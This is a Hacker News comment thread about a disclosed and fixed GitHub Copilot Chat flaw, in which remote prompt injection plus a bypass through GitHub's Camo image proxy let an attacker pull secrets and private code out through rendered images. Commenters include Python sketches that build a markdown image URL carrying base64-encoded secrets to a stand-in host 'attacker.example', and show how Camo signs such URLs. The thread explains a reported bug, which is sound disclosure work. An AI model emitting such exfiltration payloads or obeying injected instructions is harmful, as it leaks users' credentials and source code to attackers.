To supplement the parent, this is straight from the article’s TLDR (emphasis mine):
> In June 2025, I found a critical vulnerability in GitHub Copilot Chat (CVSS 9.6) that allowed silent exfiltration of secrets and source code from private repos, and gave me full control over Copilot’s responses, including suggesting malicious code or links.
> The attack combined a novel CSP bypass using GitHub’s own infrastructure with remote prompt injection. I reported it via HackerOne, and GitHub fixed it by disabling image rendering in Copilot Chat completely.
And parent is clearly responding to gp’s incorrect claims that “…without disclosing how they fixed it. Surely you could just do the base64 thing to an image url of your choice?” I’m sure there will be more attacks discovered in the future, but gp is plain wrong on these points.
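For anyone unfamiliar, the "base64 thing" gp mentions is the classic image-exfiltration pattern: a prompt injection gets the assistant to emit a markdown image whose URL carries the stolen data, so merely rendering the response leaks it. A minimal sketch of that payload shape, with a hypothetical attacker domain (this is the generic pattern, not the article's actual exploit, which additionally needed the Camo CSP bypass):

```python
import base64

ATTACKER_HOST = "https://attacker.example"  # hypothetical attacker-controlled server

def exfil_image_markdown(secret: str) -> str:
    # URL-safe base64 so the secret survives inside a query string; the
    # victim's browser fires the request as soon as the image is rendered.
    payload = base64.urlsafe_b64encode(secret.encode()).decode()
    return f"![img]({ATTACKER_HOST}/pixel.png?d={payload})"

print(exfil_image_markdown("AWS_SECRET_ACCESS_KEY=..."))
# -> ![img](https://attacker.example/pixel.png?d=QVdT...)
```

Which is exactly why GitHub's fix of not rendering inline images at all closes the hole.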
Please RTFA or at least RTFTLDR before you vote.
Take a chill pill.
I did, in fact, read the fine article.
If you did so too, you would've read the message from github which says "...disallow usage of camo to disclose sensitive victim user content"
Now why on earth would I go to all the effort of coming up with a new way of fooling this stupid AI only to give it away on HN? Would you? I don't have a premium account, nor will I ever pay Microsoft a single penny. If you actually want something you can try for yourself, go find someone else to do it.
Just to make it clear for you, I was musing on the notion of being able to write out the steps to exploitation in plain English. Since the dawn of programming languages, it has been a pie-in-the-sky idea to write a program in natural language. Combine that with computing on the server end of some major SaaS, and you can bet people will find clever ways to circumvent safety measures. They had it coming, and the whack-a-mole game is on. Case in point: TFA.
> If you did so too, you would've read the message from github which says "...disallow usage of camo to disclose sensitive victim user content"
They use "camo" to proxy all image URLs, but they did in fact remove the rendering of all inline images in markdown, which eliminates the ability to exfil data using images.
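To spell out why proxying alone wasn't enough: a Camo-style proxy simply HMAC-signs whatever image URL shows up in the markdown, attacker domains included, so the signed URL still fetches from (and therefore still leaks to) the attacker's server. Rough sketch of the signing scheme, based on the open-source camo project (the key and exact production format are assumptions):

```python
import hashlib
import hmac

CAMO_KEY = b"not-the-real-key"  # assumption: the real shared secret lives server-side

def camo_url(image_url: str) -> str:
    # HMAC over the original URL, with the URL itself hex-encoded into the
    # path. There is no allowlist: any URL gets a valid signature, which is
    # why proxying by itself cannot stop image-based exfiltration.
    digest = hmac.new(CAMO_KEY, image_url.encode(), hashlib.sha1).hexdigest()
    return f"https://camo.githubusercontent.com/{digest}/{image_url.encode().hex()}"

print(camo_url("https://attacker.example/pixel.png?d=QVdT..."))
```

Hence the only real fix was to stop rendering inline images entirely.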
> Now why on earth would I take all the effort to come up with a new way of fooling this stupid AI only to give it away on HN?
You just didn't make it very clear that you discovered some other unknown technique to exfil data. Might I encourage you to report what you found to GitHub?
https://bounty.github.com/